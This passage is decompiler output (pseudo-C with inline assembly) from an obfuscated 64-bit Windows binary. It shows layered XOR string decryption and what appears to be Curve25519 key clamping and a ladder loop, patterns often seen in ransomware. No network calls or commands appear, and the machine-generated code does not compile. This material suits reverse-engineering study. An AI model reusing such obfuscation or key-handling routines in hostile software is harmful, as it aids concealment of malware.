				void* _t3588;
				intOrPtr* _t3599;
				intOrPtr _t3600;
				void* _t3601;
				signed long long _t3604;
				signed long long _t3605;
				signed long long* _t3608;
				signed long long _t3609;
				signed long long _t3610;
				signed long long _t3612;
				unsigned long long _t3637;
				void* _t3639;
				signed long long _t3798;
				signed long long _t3803;
				signed long long _t3805;
				unsigned long long _t3808;
				signed long long _t3852;
				signed long long _t3857;
				unsigned long long _t3864;
				void* _t3866;
				signed long long _t3868;
				signed long long _t3870;
				long long _t3879;
				intOrPtr _t3880;
				signed long long _t3886;
				signed int* _t3888;
				long long _t3889;
				intOrPtr _t3890;
				signed long long _t3894;
				signed long long _t3896;
				void* _t3904;
				signed int* _t3905;
				intOrPtr _t3908;
				signed long long _t3911;
				signed long long _t3913;

				_t1979 = __esp;
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fc766;
				asm("dec eax");
				_t2264 = 0x18983742 + (0xf30fc766 -  *0xf319c210 ^ 0xb59e26b1) * 0xf05b3362 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1c0) = __rdx;
				 *(_t3601 + 0x1a0) =  *0x7FEF3102D18 ^  *0x7FEF30FC766;
				if (0xfffffff8 - 0x20 < 0) goto 0xf3045330;
				 *(_t3601 + 0x1c8) = 0x358a3269 ^  *0x7FEF30FC78E;
				E000007FE7FEF30694DF(0, _t2264, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				asm("movups xmm0, [esp+0x1bc]");
				asm("movups [eax+0x1c], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf3102978;
				_t2266 =  *0xf319c218; // 0x5c2270df5c2c4ce5
				asm("dec eax");
				_t2268 = _t2266 - 1 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1c0) = 0;
				_t3530 =  *0x7FEF3102D44 ^  *_t2268;
				 *(_t3601 + 0x1a0) = _t3530;
				if (0xfffffff8 - 0x20 < 0) goto 0xf30453f7;
				_t3387 = _t3601 + 0x1a0;
				 *(_t3387 + 0x28) = 0x677d4c54 ^ _t2268[0xa];
				E000007FE7FEF30694DF(0, _t2268, 0);
				asm("movaps xmm0, [esi]");
				asm("movaps xmm1, [esi+0x10]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				asm("movups xmm0, [esi+0x1c]");
				asm("movups [eax+0x1c], xmm0");
				 *_t3387 = 0xf30fa1e2;
				asm("dec eax");
				_t3531 = _t3530 +  *_t3387;
				r8d = 0xe0;
				E000007FE7FEF30F24C0();
				_t3050 =  *0x7FEF3102D70 ^  *_t3531;
				 *(_t3601 + 0x1a0) = _t3050;
				if (0xfffffff8 - 0xd8 < 0) goto 0xf30454aa;
				_t3388 = _t3601 + 0x1a0;
				 *(_t3388 + 0xe0) = 0x03ba9344 ^ _t3531[0x38];
				E000007FE7FEF30694DF(0, 0, 0xf3102d70);
				r8d = 0xe4;
				E000007FE7FEF30F1E10();
				 *_t3388 = 0xf3100f34;
				asm("dec eax");
				r8d = 0xb0;
				E000007FE7FEF30F24C0();
				_t3055 =  *0x7FEF3102E54 ^  *(_t3388 +  *_t3388);
				 *(_t3601 + 0x1a0) = _t3055;
				if (0xfffffff8 - 0xa8 < 0) goto 0xf3045556;
				E000007FE7FEF30694DF(0, 0, 0xf3102e54);
				 *(_t3601 + 0x50) = _t3055;
				_t3390 = _t3601 + 0x1a0;
				r8d = 0xb0;
				 *((long long*)(_t3601 + 0x58)) = 0xfffffff8;
				E000007FE7FEF30F1E10();
				 *_t3390 = 0xf30f7761;
				asm("dec eax");
				asm("dec eax");
				asm("xorps xmm0, xmm0");
				asm("movaps [esi], xmm0");
				asm("movaps [esi+0x10], xmm0");
				asm("movaps [esi+0x20], xmm0");
				asm("movaps [esi+0x30], xmm0");
				asm("movaps [esi+0x40], xmm0");
				 *((long long*)(_t3390 + 0x50)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF3102F04 ^  *0xFFFFFFFFF62EB3DA;
				if (0xfffffff8 - 0x50 < 0) goto 0xf3045604;
				E000007FE7FEF30694DF(0, ((0xf62eb3da ^  *0xf319c230) + 0x263338a5) * 0x7716510d +  *_t3390, 0);
				 *((long long*)(_t3601 + 0x540)) = 0xf3102f04;
				_t3393 = _t3601 + 0x1a0;
				r8d = 0x58;
				 *((long long*)(_t3601 + 0x5d8)) = 0xf62eb3da;
				E000007FE7FEF30F1E10();
				 *_t3393 = 0xf30f70cc;
				asm("dec eax");
				_t2286 = (0x000001c0 ^ 0x06b398c8 *  *0xf319c238) +  *_t3393;
				asm("xorps xmm0, xmm0");
				asm("movaps [esi], xmm0");
				 *((long long*)(_t3393 + 0x10)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF3102F5C ^  *0xFE000000000001C0;
				if (0xfffffff8 - 0x10 < 0) goto 0xf30456a9;
				E000007FE7FEF30694DF(0, _t2286, 0);
				 *((long long*)(_t3601 + 0x5d0)) = 0xf3102f5c;
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				 *((long long*)(_t3601 + 0x5a8)) = 0x1c0;
				 *((long long*)(_t2286 + 0x10)) =  *((intOrPtr*)(_t3601 + 0x1b0));
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fc003;
				_t2288 =  *0xf319c240; // 0x29bdf197463640c9
				asm("dec eax");
				asm("dec eax");
				_t2289 = _t2288 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				asm("movaps [esp+0x1c0], xmm0");
				asm("movaps [esp+0x1d0], xmm0");
				_t3397 =  *0x7FEF3102F74 ^  *_t2289;
				 *(_t3601 + 0x1a0) = _t3397;
				if (0xfffffff8 - 0x38 < 0) goto 0xf304575f;
				E000007FE7FEF30694DF(0, _t2289, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movaps xmm2, [esp+0x1c0]");
				asm("movaps xmm3, [esp+0x1d0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax+0x20], xmm2");
				 *(_t3601 + 0x598) = _t2289;
				asm("movups [eax+0x30], xmm3");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fb8f4;
				asm("dec eax");
				 *((long long*)(_t3601 + 0x5c8)) = 0xf3102f74;
				_t2294 = (_t3397 -  *0xf319c248 >> 0x00000007 ^ _t3397 -  *0xf319c248) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF3102FB4 ^  *_t2294;
				if (0xfffffff8 - 0x18 < 0) goto 0xf3045825;
				E000007FE7FEF30694DF(0, _t2294, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				 *(_t3601 + 0x580) = _t2294;
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fbceb;
				asm("dec eax");
				asm("dec eax");
				 *((long long*)(_t3601 + 0x5c0)) = 0xf3102fb4;
				_t2299 =  !(0xcd3bd86e -  *0xf319c250) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF3102FD4 ^  *0xFFFFFFFFCD3BD86E;
				if (0xfffffff8 - 0x18 < 0) goto 0xf30458ca;
				 *(_t3601 + 0x1c0) = 0x747e89a0 ^  *0xFFFFFFFFCD3BD88E;
				E000007FE7FEF30694DF(0, _t2299, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x558)) = 0xcd3bd86e;
				 *(_t2299 + 0x20) =  *(_t3601 + 0x1c0);
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fe170;
				_t3405 =  *0xf319c258; // 0xd1d9aa71ea45d57c
				asm("dec eax");
				asm("dec eax");
				 *((long long*)(_t3601 + 0x5b0)) = 0xf3102fd4;
				_t2305 =  !(_t3405 >> 0x00000006 ^ _t3405) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF3102FF8 ^  *_t2305;
				if (0xfffffff8 - 0x18 < 0) goto 0xf3045998;
				 *(_t3601 + 0x1c0) = 0x2cc2f39d ^ _t2305[8];
				E000007FE7FEF30694DF(0, _t2305, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				 *(_t3601 + 0x570) = _t2305;
				_t2305[8] =  *(_t3601 + 0x1c0);
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30f75c8;
				 *((long long*)(_t3601 + 0x5b8)) = 0xf3102ff8;
				_t2308 = ((0xf30f75c8 << 0x00000020 | _t3531 -  *0xf319c260) << 1) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF310301C ^  *0x7FEF30F75C8;
				if (0xfffffff8 - 0x18 < 0) goto 0xf3045a5e;
				 *(_t3601 + 0x1c0) = 0x1a6722b3 ^  *0x7FEF30F75E8;
				E000007FE7FEF30694DF(0, _t2308, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x548)) = 0xf30f75c8;
				 *(_t2308 + 0x20) =  *(_t3601 + 0x1c0);
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30f3a4f;
				asm("dec eax");
				asm("dec eax");
				 *((long long*)(_t3601 + 0x5a0)) = 0xf310301c;
				_t2313 = (0xbf22f60b ^  *0xf319c268) + 1 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF3103040 ^  *0xFFFFFFFFBF22F60B;
				if (0xfffffff8 - 0x18 < 0) goto 0xf3045b1d;
				 *(_t3601 + 0x1c0) = 0xa5c8afcb ^  *0xFFFFFFFFBF22F62B;
				E000007FE7FEF30694DF(0, _t2313, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x528)) = 0xbf22f60b;
				 *(_t2313 + 0x20) =  *(_t3601 + 0x1c0);
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fcff6;
				 *((long long*)(_t3601 + 0x590)) = 0xf3103040;
				asm("dec eax");
				_t2317 = 0xd5bc6103 +  *0xf319c270 * 0xb2a02d2b +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				asm("movaps [esp+0x1c0], xmm0");
				asm("movaps [esp+0x1d0], xmm0");
				asm("movaps [esp+0x1e0], xmm0");
				 *(_t3601 + 0x1a0) =  *0x7FEF3103064 ^  *_t2317;
				if (0xfffffff8 - 0x48 < 0) goto 0xf3045bfd;
				_t3412 = _t3601 + 0x1a0;
				 *(_t3412 + 0x50) = 0xb6db17ff ^ _t2317[0x14];
				E000007FE7FEF30694DF(0, _t2317, 0);
				 *((long long*)(_t3601 + 0x588)) = 0xf3103064;
				r8d = 0x54;
				 *(_t3601 + 0x518) = _t2317;
				E000007FE7FEF30F1E10();
				 *_t3412 = 0xf30fadee;
				asm("dec eax");
				_t2321 = (0xf30fadee ^  *0xf319c278) + 0x216e9215 +  *_t3412;
				asm("xorps xmm0, xmm0");
				asm("movaps [esi], xmm0");
				 *((long long*)(_t3412 + 0x10)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF31030B8 ^  *0x7FEF30FADEE;
				if (0xfffffff8 - 0x10 < 0) goto 0xf3045c9e;
				 *(_t3601 + 0x1b8) = 0xce99023e ^  *0x7FEF30FAE06;
				E000007FE7FEF30694DF(0, _t2321, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [esp+0x1ac]");
				 *((long long*)(_t3601 + 0x508)) = _t2321;
				asm("movups [eax+0xc], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30fc447;
				asm("dec eax");
				asm("dec eax");
				 *((long long*)(_t3601 + 0x578)) = 0xf31030b8;
				_t2326 = (0xcdfbbe46 +  *0xf319c280) * 0xc169478d +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				_t3542 =  *0x7FEF31030D4 ^  *0xFFFFFFFFCDFBBE46;
				 *(_t3601 + 0x1a0) = _t3542;
				if (0xfffffff8 - 0x18 < 0) goto 0xf3045d55;
				E000007FE7FEF30694DF(0, _t2326, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				 *((long long*)(_t3601 + 0x500)) = _t2326;
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf31032bc;
				asm("dec eax");
				 *((long long*)(_t3601 + 0x568)) = 0xf31030d4;
				_t2333 = 0x76d9a49b + (_t3542 -  *0xf319c288 >> 0x00000016 ^ _t3542 -  *0xf319c288) * 0x8a1b1154 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				 *((long long*)(_t3601 + 0x1b0)) = _t3412;
				 *(_t3601 + 0x1a0) =  *0x7FEF31030F4 ^  *_t2333;
				if (0xfffffff8 - 0x10 < 0) goto 0xf3045e08;
				 *(_t3601 + 0x1b8) = 0x75eb69cb ^ _t2333[6];
				E000007FE7FEF30694DF(0, _t2333, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [esp+0x1ac]");
				 *(_t3601 + 0x4f8) = _t2333;
				asm("movups [eax+0xc], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf310313f;
				asm("dec eax");
				 *((long long*)(_t3601 + 0x560)) = 0xf31030f4;
				_t2336 = (0xf310313f ^  *0xf319c290) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				 *((long long*)(_t3601 + 0x1b0)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF3103110 ^  *0x7FEF310313F;
				if (0xfffffff8 - 0x10 < 0) goto 0xf3045ec0;
				 *(_t3601 + 0x1b8) = 0x74a511b0 ^  *0x7FEF3103157;
				E000007FE7FEF30694DF(0, _t2336, 0);
				 *((long long*)(_t3601 + 0x550)) = 0xf3103110;
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [esp+0x1ac]");
				 *((long long*)(_t3601 + 0x4f0)) = _t2336;
				asm("movups [eax+0xc], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf31006da;
				asm("dec eax");
				asm("dec eax");
				_t2342 = (0x921f4aee -  *0xf319c298 ^ 0xa072d93a) + 0xdd7f46d5 +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				 *(_t3601 + 0x1c0) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF310312C ^  *0xFFFFFFFF921F4AEE;
				if (0xfffffff8 - 0x20 < 0) goto 0xf3045f89;
				E000007FE7FEF30694DF(0, _t2342, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movaps xmm1, [esp+0x1b0]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				 *((long long*)(_t3601 + 0x4e0)) = 0x921f4aee;
				 *((long long*)(_t2342 + 0x20)) =  *(_t3601 + 0x1c0);
				 *((long long*)(_t3601 + 0x1a0)) = 0xf31010a2;
				asm("dec eax");
				 *((long long*)(_t3601 + 0x538)) = 0xf310312c;
				_t2347 = 0xd7809c48 + (0xf31010a2 ^  *0xf319c2a0) * 0xc6b50cc +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				 *((long long*)(_t3601 + 0x1b0)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF3103154 ^  *0x7FEF31010A2;
				if (0xfffffff8 - 0x10 < 0) goto 0xf3046045;
				 *(_t3601 + 0x1b8) = 0x374cb9c7 ^  *0x7FEF31010BA;
				E000007FE7FEF30694DF(0, _t2347, 0);
				 *((long long*)(_t3601 + 0x530)) = 0xf3103154;
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [esp+0x1ac]");
				 *((long long*)(_t3601 + 0x4d8)) = _t2347;
				asm("movups [eax+0xc], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30f6d1d;
				_t2349 =  *0xf319c2a8; // 0x7d8c290198e1fbd0
				asm("dec eax");
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				asm("movaps [esp+0x1b0], xmm0");
				asm("movaps [esp+0x1c0], xmm0");
				asm("movaps [esp+0x1d0], xmm0");
				 *((long long*)(_t3601 + 0x1e0)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF3103170 ^  *0xFFFFFFFFFEA47108;
				if (0xfffffff8 - 0x40 < 0) goto 0xf3046125;
				E000007FE7FEF30694DF(0, (0xfea47108 - (_t2349 >> 0x0000001b ^ _t2349)) * 0x8e6fec0c +  *((intOrPtr*)(_t3601 + 0x1a0)), 0);
				 *((long long*)(_t3601 + 0x520)) = 0xf3103170;
				_t3413 = _t3601 + 0x1a0;
				r8d = 0x48;
				 *((long long*)(_t3601 + 0x4d0)) = 0xfea47108;
				E000007FE7FEF30F1E10();
				 *_t3413 = 0xf30fbe3e;
				asm("dec eax");
				_t2357 = 0x9d2549a8 -  *0xf319c2b0 +  *_t3413;
				asm("xorps xmm0, xmm0");
				asm("movaps [esi], xmm0");
				 *((long long*)(_t3413 + 0x10)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF31031B8 ^  *0xFFFFFFFF9D2549A8;
				if (0xfffffff8 - 0x10 < 0) goto 0xf30461b6;
				 *(_t3601 + 0x1b8) = 0x454dff5e ^  *0xFFFFFFFF9D2549C0;
				E000007FE7FEF30694DF(0, _t2357, 0);
				asm("movaps xmm0, [esp+0x1a0]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [esp+0x1ac]");
				 *((long long*)(_t3601 + 0x4c8)) = _t2357;
				asm("movups [eax+0xc], xmm0");
				 *((long long*)(_t3601 + 0x1a0)) = 0xf30f7283;
				_t3557 =  *0xf319c2b8; // 0x53b4f96e85318df8
				asm("dec eax");
				 *((long long*)(_t3601 + 0x510)) = 0xf31031b8;
				_t2363 = (_t3557 >> 0x00000012 ^ _t3557 ^ 0xa6a865c8) +  *((intOrPtr*)(_t3601 + 0x1a0));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x1a0], xmm0");
				 *((long long*)(_t3601 + 0x1b0)) = 0;
				 *(_t3601 + 0x1a0) =  *0x7FEF31031D4 ^  *_t2363;
				if (0xfffffff8 - 0x10 < 0) goto 0xf304627b;
				E000007FE7FEF30694DF(0, _t2363, 0);
				 *((long long*)(_t3601 + 0x4e8)) = 0xf31031d4;
				_t3087 = _t3601 + 0x1a0;
				asm("movaps xmm0, [edx]");
				asm("movups [eax], xmm0");
				 *(_t3601 + 0x4c0) = _t2363;
				_t2363[4] =  *((intOrPtr*)(_t3087 + 0x10));
				 *_t3087 = 0xfffffff8;
				 *(_t3087 + 8) = _t3050;
				 *((long long*)(_t3087 + 0x10)) = 0xe4;
				E000007FE7FEF304329C();
				if ( *((long long*)(_t3601 + 0x360)) == 0) goto 0xf304a90f;
				_t3415 = _t3601 + 0x360;
				 *((long long*)(_t3601 + 0x70)) =  *((intOrPtr*)(_t3415 + 0x10));
				asm("movups xmm0, [esi]");
				asm("movaps [esp+0x60], xmm0");
				_t3088 = _t3601 + 0x1a0;
				 *_t3088 = _t2264;
				 *((long long*)(_t3088 + 8)) = 0xf3102d18;
				 *((long long*)(_t3088 + 0x10)) = 0x2c;
				E000007FE7FEF304329C();
				if ( *_t3415 == 0) goto 0xf304a92f;
				_t3416 = _t3601 + 0x360;
				 *((long long*)(_t3601 + 0x3c0)) =  *((intOrPtr*)(_t3416 + 0x10));
				asm("movups xmm0, [esi]");
				asm("movaps [esp+0x3b0], xmm0");
				_t3089 = _t3601 + 0x1a0;
				 *_t3089 = _t2268;
				_t3089[1] = 0xf3102d44;
				_t3089[2] = 0x2c;
				E000007FE7FEF304329C();
				if ( *_t3416 == 0) goto 0xf304a94f;
				_t2366 =  *((intOrPtr*)(_t3601 + 0x370));
				 *(_t3601 + 0x400) = _t2366;
				asm("movups xmm0, [esp+0x360]");
				asm("movaps [esp+0x3f0], xmm0");
				_t3090 =  *((intOrPtr*)(_t3601 + 0x3c0));
				if (_t3090 - 0x1f <= 0) goto 0xf304a96f;
				E000007FE7FEF306239E(_t2366, _t3416);
				_t3563 = _t3090;
				asm("movups xmm0, [esi]");
				asm("movups xmm1, [esi+0x10]");
				asm("movups [eax+0x10], xmm1");
				asm("movups [eax], xmm0");
				_t3091 =  *(_t3601 + 0x400);
				if (_t3091 - 0x1f <= 0) goto 0xf304a978;
				E000007FE7FEF306239E(_t2366, _t3416);
				_t3418 = _t2366;
				asm("movups xmm0, [edi]");
				asm("movups xmm1, [edi+0x10]");
				asm("movups [eax], xmm0");
				asm("movups [eax+0x10], xmm1");
				_t3092 = _t3601 + 0x360;
				 *_t3092 = _t2366;
				_t3092[1] = _t3563;
				_t3092[2] = 0x20;
				E000007FE7FEF3043082();
				if ( *((char*)(_t3601 + 0x1a0)) != 0) goto 0xf304a989;
				_t2593 = _t3601 + 0x1a0;
				asm("movups xmm0, [ebx+0x1]");
				asm("movups xmm1, [ebx+0x11]");
				asm("movaps [esp+0x160], xmm1");
				asm("movaps [esp+0x150], xmm0");
				_t3093 = _t3601 + 0x360;
				 *_t3093 = _t3418;
				_t3093[1] = _t3091;
				_t3093[2] = 0x20;
				E000007FE7FEF3043082();
				_t2008 =  *_t2593;
				if (_t2008 != 0) goto 0xf304a9b2;
				_t3309 = _t3601 + 0x899;
				asm("movups xmm0, [ecx+0x1]");
				asm("movups xmm1, [ecx+0x11]");
				asm("movaps [esp+0x880], xmm1");
				asm("movaps [esp+0x870], xmm0");
				r9d =  *(_t3601 + 0x155) & 0x000000ff;
				r8d =  *(_t3601 + 0x158) & 0x000000ff;
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0xe]");
				asm("movups [edi+0xe], xmm1");
				asm("movups [edi], xmm0");
				 *(_t3309 - 1) =  *(_t3601 + 0x870) & 0x000000f8;
				 *(_t3309 + 0x1e) =  *(_t3601 + 0x88f) & 0x0000003f | 0x00000040;
				_t3420 = _t3418 << 0x00000020 | _t2593;
				_t3798 = __r9 << 0x00000028 | _t3420;
				r10d =  *(_t3601 + 0x15b) & 0x000000ff;
				_t3565 = _t3563 << 0x00000008 | _t2366;
				r9d =  *(_t3601 + 0x15c) & 0x000000ff;
				_t3604 = __r8 << 0x00000010 | _t3565;
				_t3096 = _t3601 + 0x00000871 << 0x00000018 | _t3604;
				_t2595 = _t2593 << 0x00000020 | _t3096;
				_t3567 = _t3565 << 0x00000008 | _t3798;
				_t1713 =  *(_t3601 + 0x161) & 0x000000ff;
				_t3422 = _t3420 << 0x00000010 | _t3567;
				r8d =  *(_t3601 + 0x162) & 0x000000ff;
				_t3098 = _t3096 << 0x00000018 | _t3422;
				_t3311 = _t3309 << 0x00000020 | _t3098;
				_t3605 = _t3604 << 0x30;
				_t3100 = _t3098 << 0x00000008 | _t3567;
				r8d =  *(_t3601 + 0x167) & 0x000000ff;
				_t3313 = _t3311 << 0x00000010 | _t3100;
				_t3424 = _t3422 << 0x00000018 | _t3313;
				_t3315 = _t3313 << 0x00000008 | _t3100;
				_t3102 = _t3100 << 0x00000028 | _t3605 << 0x00000020 | _t3424;
				_t3426 = _t3424 << 0x00000010 | _t3315;
				_t3104 = _t3102 << 0x00000018 | _t3426;
				_t3317 = _t3315 << 0x00000020 | _t3104;
				_t3428 = _t3426 << 0x00000028 | _t3317;
				 *(_t3601 + 0x3c8) = (_t2366 << 0x00000030 | _t3798) & 0xffffffff;
				 *(_t3601 + 0x3d0) = (_t3798 << 0x00000030 | __r10 << 0x00000028 | _t2595) >> 0x00000003 & 0xffffffff;
				 *(_t3601 + 0x3d8) = (_t3567 << 0x00000038 | _t3605 | _t2595 << 0x00000028 | _t3311) >> 0x00000006 & 0xffffffff;
				_t3322 = (_t3317 << 0x00000038 | _t3104 << 0x00000030 | _t3428) >> 0x0000000c & 0xffffffff;
				 *(_t3601 + 0x3e0) = (_t3313 << 0x00000030 | _t3102) >> 0x00000001 & 0xffffffff;
				 *(_t3601 + 0x3e8) = _t3322;
				asm("xorps xmm0, xmm0");
				asm("movups [esp+0x2d8], xmm0");
				asm("movups [esp+0x2c8], xmm0");
				asm("movups [esp+0x2b8], xmm0");
				asm("movups [esp+0x2a8], xmm0");
				 *(_t3601 + 0x2e8) = 0;
				_t3608 = _t3601 + 0xb8;
				 *(_t3608 - 8) = _t3322;
				 *((long long*)(_t3608 - 0x18)) =  *(_t3601 + 0x3d8);
				_t2371 =  *(_t3601 + 0x3e0);
				 *(_t3608 - 0x10) = _t2371;
				 *(_t3601 + 0x2a0) = _t2371;
				asm("movups xmm1, [esp+0x3c8]");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				 *_t3608 = _t2371;
				r8d = 0x100;
				E000007FE7FEF30F24C0();
				asm("bt eax, ecx");
				 *((char*)(_t3601 + _t3428 + 0x1a0)) = _t2008 > 0;
				_t353 = _t3428 + 1; // 0x1
				_t2374 = _t353;
				if (_t2374 != 0x100) goto 0xf3046773;
				_t1829 =  *((intOrPtr*)(_t3601 + _t2374 + 0x19f));
				 *((long long*)(_t3601 + 0x350)) = _t2374 - 1;
				 *(_t3601 + 0x348) = _t1829;
				_t1458 = E000007FE7FEF30A60AD( *(_t3601 + 0x29f) ^ _t1829, _t2374 - 1);
				_t3573 =  *(_t3601 + 0x2a0);
				 *(_t3601 + 0x320) = _t3573;
				_t3107 =  *(_t3601 + 0x2a8);
				 *(_t3601 + 0x318) = _t3107;
				_t2603 =  *(_t3601 + 0x2b0);
				 *(_t3601 + 0x308) = _t2603;
				_t3430 =  *(_t3601 + 0x2b8);
				 *(_t3601 + 0x358) = _t3430;
				_t3609 =  *(_t3601 + 0x2c0);
				 *(_t3601 + 0x148) = _t3609;
				r13d = _t1458 & 0x000000ff;
				_t2376 =  *(_t3601 + 0x90);
				 *(_t3601 + 0x340) = _t2376;
				_t3323 =  *(_t3601 + 0x98);
				 *(_t3601 + 0x338) = _t3323;
				 *(_t3601 + 0x198) = (_t2376 ^ _t3573) &  ~0xf3102d44;
				_t3325 = (_t3323 ^ _t3107) &  ~0xf3102d44;
				_t3574 =  *(_t3601 + 0xa0);
				 *(_t3601 + 0x330) = _t3574;
				_t3576 = (_t3574 ^ _t2603) &  ~0xf3102d44;
				_t3911 =  *(_t3601 + 0xa8);
				 *(_t3601 + 0x328) = _t3911;
				_t3913 = (_t3911 ^ _t3430) &  ~0xf3102d44;
				_t3868 =  *(_t3601 + 0xb0);
				 *(_t3601 + 0x310) = _t3868;
				_t3870 = (_t3868 ^ _t3609) &  ~0xf3102d44;
				_t2379 =  *(_t3601 + 0x2c8);
				 *(_t3601 + 0x88) = _t2379;
				_t3894 =  *(_t3601 + 0xb8);
				 *(_t3601 + 0x300) = _t3894;
				_t3896 = (_t3894 ^ _t2379) &  ~0xf3102d44;
				_t3431 =  *(_t3601 + 0x2d0);
				_t3803 =  *(_t3601 + 0xc0);
				 *(_t3601 + 0x2f8) = _t3803;
				_t3805 = (_t3803 ^ _t3431) &  ~0xf3102d44;
				_t3857 =  *(_t3601 + 0x2d8);
				_t3610 =  *(_t3601 + 0xc8);
				 *(_t3601 + 0x118) = _t3610;
				_t3612 = (_t3610 ^ _t3857) &  ~0xf3102d44;
				_t3852 =  *(_t3601 + 0x2e0);
				_t2732 =  *(_t3601 + 0xd0);
				 *(_t3601 + 0x110) = _t2732;
